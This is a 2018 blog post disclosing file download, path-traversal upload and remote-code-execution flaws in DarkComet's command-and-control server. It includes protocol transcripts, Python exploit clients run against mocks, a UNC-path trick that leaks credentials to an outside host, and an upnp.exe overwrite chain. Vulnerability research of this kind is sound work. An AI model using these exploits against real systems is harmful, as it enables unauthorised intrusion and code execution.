DarkComet upload vulnerability

This post introduces a file upload vulnerability in DarkComet's C&C server. A flaw that lets an attacker download files from the server has been known for many years, but there seems to be no mention of this very similar vulnerability in the upload direction. A quick disclaimer before we get into the actual matter: hacking a C&C server might seem morally justified, but it is still illegal. Don't do it.

Intro

DarkComet has been used by script kiddies and repressive regimes alike. I started the search for a vulnerability a few days ago and found many interesting articles on DarkComet. All of them mention the file download vulnerability we will look at first. The C&C server uses a QUICKUP command to push a file to a client. It looks like this (C denotes the client and S the server):

S: QUICKUPC:\some\file.jpg|123|UPLOADEXEC

The client then opens a new connection:

S: IDTYPE
C: QUICKUP123|C:\some\file.jpg|UPLOADEXEC
S: \x41\x00\x43
C: A
S: <file length>
C: A
S: <raw file data>

The C&C server doesn't check whether it ever issued an upload command with the ID the client claims. This means anyone who can connect to the server can download any file the server process can read. Unfortunately, since there is no way to make the server list a directory, the vulnerability is limited to files with known names. Usually the only interesting ones are comet.db, which contains the list of all victims and the keylog data, and config.ini, which may contain no-ip.org credentials.
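The download exchange above, as an added Python example that is not part of the original post and not DarkComet's own code. A mock server speaks exactly the byte sequence transcribed on the page and, like the real one, never checks whether it issued the upload ID the client names; the client simply claims ID 123 and reads the file back. The file contents, the paths, the lockstep one-recv-per-message framing and the behaviour on an unknown path (connection dropped) are assumptions for illustration; the example runs over a socketpair so it works offline.

```python
import socket
import threading

# Constructed stand-in for the server's disk; contents are placeholders, not real DarkComet data.
MOCK_FILES = {
    r"C:\DarkComet\comet.db": b"SQLite format 3\x00(constructed victim list and keylog table)",
    r"C:\DarkComet\config.ini": b"[NOIP]\nuser=constructed\npass=constructed\n",
}


def mock_quickup_server(conn, files):
    """Server side of the QUICKUP transfer as transcribed on the page.

    Note what is missing: no check that an upload with this ID was ever issued,
    and the path to read comes straight from the client.
    """
    try:
        conn.sendall(b"IDTYPE")
        req = conn.recv(4096).decode("latin-1")
        if not req.startswith("QUICKUP"):
            return
        parts = req[len("QUICKUP"):].split("|")
        if len(parts) < 3:
            return
        path = parts[1]                       # client-controlled, unchecked
        conn.sendall(b"\x41\x00\x43")
        if conn.recv(4096) != b"A":
            return
        data = files.get(path)
        if data is None:                      # assumption: unknown path just drops the connection
            return
        conn.sendall(str(len(data)).encode())
        if conn.recv(4096) == b"A":
            conn.sendall(data)
    finally:
        conn.close()


def quickup_download(sock, path, upload_id=123):
    """Client side: claim an upload ID we were never given and read the file back."""
    if sock.recv(4096) != b"IDTYPE":
        return None
    sock.sendall(f"QUICKUP{upload_id}|{path}|UPLOADEXEC".encode("latin-1"))
    if sock.recv(4096) != b"\x41\x00\x43":
        return None
    sock.sendall(b"A")
    length_msg = sock.recv(4096)
    if not length_msg:                        # server closed: no such file
        return None
    length = int(length_msg.decode())
    sock.sendall(b"A")
    buf = b""
    while len(buf) < length:                  # raw data follows, exactly <length> bytes
        chunk = sock.recv(min(65536, length - len(buf)))
        if not chunk:
            raise ConnectionError("server closed mid-transfer")
        buf += chunk
    return buf


def fetch_from_mock(path, files=MOCK_FILES):
    """Run one exchange over a socketpair so the example needs no network."""
    client_end, server_end = socket.socketpair()
    t = threading.Thread(target=mock_quickup_server, args=(server_end, files))
    t.start()
    try:
        return quickup_download(client_end, path)
    finally:
        client_end.close()
        t.join()


if __name__ == "__main__":
    for name in (r"C:\DarkComet\comet.db", r"C:\DarkComet\config.ini", r"C:\nope.txt"):
        got = fetch_from_mock(name)
        print(name, "->", None if got is None else f"{len(got)} bytes")
```

Against a real server the client would connect with a TCP socket instead of a socketpair; the three messages it sends are the same. The check the server is missing is a lookup of the upload ID in its own table of issued QUICKUP commands before it opens the path.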

While this vulnerability is interesting, it is nothing like remote code execution. A logical starting point is the upload functionality of DarkComet, that is, the direction in which the server receives a file from a client:

Upload functionality

When the C&C server downloads a file from a client, this is what happens:

S: DOWNLOADFILE596|C:\some\file.jpg

The client then opens a new connection:

S: IDTYPE
C: FILETRANSFER0|596
S: \x41\x00\x43
C: FILEBOFC:\some\file.jpg|0
S: A
C: <raw file data>

The server then writes the file into a download directory chosen by the operator, under the filename file.jpg. While this might seem trivially exploitable, it unfortunately isn't: the 596 in DOWNLOADFILE596 is the socket handle of the client, and the server won't accept FILETRANSFER0|596 unless it already issued a DOWNLOADFILE to that same handle.

This leaves us with a pretty useless vulnerability: we can upload arbitrary files into a directory we don't control, on the condition that we guess a socket handle the server has already requested a file from. Guessing a socket handle isn't really hard (they always seem to be multiples of four and usually lie between 400 and 2300, which is fewer than 500 candidates). We will, however, need a trick to get the file into a directory of our choosing:

Path shenanigans

Since we control the file name in the FILEBOFC:\some\file.jpg|0 message, we can try some path shenanigans. And behold: the server splits the path on "\" and takes the last element as the file name. This means we can simply change the message to FILEBOFC:\some\../../../Windows/file.jpg|0 and the server will use ../../../Windows/file.jpg as the file name. The Windows API won't care: it happily accepts / as a path delimiter, and the .. components walk back up out of the download directory. Using this trick we can write the file into any directory on the drive that the user running DarkComet can write to.
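The upload exchange, the socket-handle check and the split-on-backslash filename extraction together, as an added Python example (not the post's proof of concept and not DarkComet's code). The mock server remembers which handles it sent a DOWNLOADFILE to, accepts a FILETRANSFER only for one of those, and derives the filename the way the post describes; the client walks the handle range the post gives (multiples of four from 400 to 2300), one fresh connection per guess, and sends the traversal path from above. Assumptions for illustration: the download directory C:\DarkComet\Downloads, the previously issued handle 596, the placeholder payload bytes, and an in-memory "disk" keyed by the path Windows would resolve (computed with ntpath.normpath). hardened_filename is a suggested fix, not anything DarkComet ships.

```python
import ntpath
import re
import socket
import threading

UPLOAD_DIR = r"C:\DarkComet\Downloads"        # constructed: the operator-chosen download directory
HANDLE_RANGE = range(400, 2301, 4)            # the range observed in the post: multiples of four


def vulnerable_filename(remote_path):
    """What the server does: split on backslash and keep the last piece.
    A '/' or '..' in that piece survives, and Windows treats '/' as a separator."""
    return remote_path.split("\\")[-1]


def hardened_filename(remote_path):
    """Suggested fix: take the last component after *both* separators and
    reject anything that is not a plain file name."""
    name = re.split(r"[\\/]", remote_path)[-1]
    if not name or name in (".", "..") or ":" in name:
        return None
    return name


def mock_upload_server(conn, state):
    """Server side of FILETRANSFER/FILEBOF as transcribed on the page."""
    try:
        conn.sendall(b"IDTYPE")
        req = conn.recv(4096).decode("latin-1")
        if not req.startswith("FILETRANSFER"):
            return
        handle = int(req[len("FILETRANSFER"):].split("|")[-1])
        if handle not in state["issued"]:          # the one check the server does make
            return
        conn.sendall(b"\x41\x00\x43")
        bof = conn.recv(4096).decode("latin-1")
        if not bof.startswith("FILEBOF"):
            return
        remote_path = bof[len("FILEBOF"):].rsplit("|", 1)[0]
        name = state["extract"](remote_path)
        if name is None:
            return
        conn.sendall(b"A")
        chunks = []
        while True:                                 # raw data until the client closes
            chunk = conn.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
        dest = ntpath.normpath(ntpath.join(UPLOAD_DIR, name))   # what the Windows API resolves
        state["written"][dest] = b"".join(chunks)
    finally:
        conn.close()


def upload_with_guessed_handle(state, remote_path, payload, handles=HANDLE_RANGE):
    """Client side: try each candidate handle on a fresh connection; return the one that worked."""
    for handle in handles:
        client_end, server_end = socket.socketpair()
        t = threading.Thread(target=mock_upload_server, args=(server_end, state))
        t.start()
        try:
            if client_end.recv(4096) != b"IDTYPE":
                continue
            client_end.sendall(f"FILETRANSFER0|{handle}".encode())
            if client_end.recv(4096) != b"\x41\x00\x43":
                continue                            # dropped: this handle was never issued
            client_end.sendall(f"FILEBOF{remote_path}|0".encode("latin-1"))
            if client_end.recv(4096) != b"A":
                continue
            client_end.sendall(payload)
            return handle
        finally:
            client_end.close()                      # EOF tells the server the file is complete
            t.join()
    return None


def demo(extract):
    """One run against a mock that earlier issued DOWNLOADFILE to handle 596."""
    state = {"issued": {596}, "extract": extract, "written": {}}
    payload = b"MZ constructed, not a real executable"
    handle = upload_with_guessed_handle(state, r"C:\some\../../../Windows/file.jpg", payload)
    return handle, state["written"]


if __name__ == "__main__":
    for extract in (vulnerable_filename, hardened_filename):
        handle, written = demo(extract)
        print(extract.__name__, "handle", handle, "wrote", list(written))
```

With the vulnerable extraction the upload lands at C:\Windows\file.jpg; with the hardened one the same request still succeeds but the file stays inside the download directory as file.jpg, which is exactly what takes the Temp\upnp.exe trick off the table. Splitting on both separators is not enough on its own, which is why the fix also rejects empty names, "." and ".." and anything containing a drive colon.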

With some more shenanigans we can also get the username of the user running DarkComet. For this we use a UNC path together with the file download vulnerability:

QUICKUP123|\\our.domain.tld\test.txt|UPLOADEXEC

The C&C server will try to connect to our network share and, in the SMB authentication attempt, leak the user and computer name (this requires that outbound SMB from the server is not filtered). This information can now be used for our final trick:

Remote code execution

The DarkComet C&C server will by default try to use UPnP to automatically open ports. It does this by writing a file called upnp.exe into the Temp directory and executing it when needed. To run our own code we combine the upload vulnerability with the leaked username and upload an executable to C:\Users\<username>\AppData\Local\Temp\upnp.exe, using enough ../ components to climb out of the download directory (extra ones are harmless, since Windows stops at the drive root). The next time the C&C server restarts, our code gets executed.

Proof of concept

A proof of concept can be found here.

Conclusion

While not easily exploitable, this could be used against many of the DarkComet C&C servers in the wild. A dedicated attacker could even write a script that behaves like a normal client and baits the operator into requesting a file download by conveniently placing passwords.txt or nudes.jpg on a fake victim's desktop. Because the server sends the DOWNLOADFILE command, handle included, to that very client, this removes the need to guess a socket handle and makes sure the precondition of the vulnerability is met.

DarkComet and other C&C servers are a cool starting place for beginners searching for vulnerabilities. They are often written by people without any proper security practices, they are network-based applications, and they can easily be found in the wild.

Written on January 15, 2018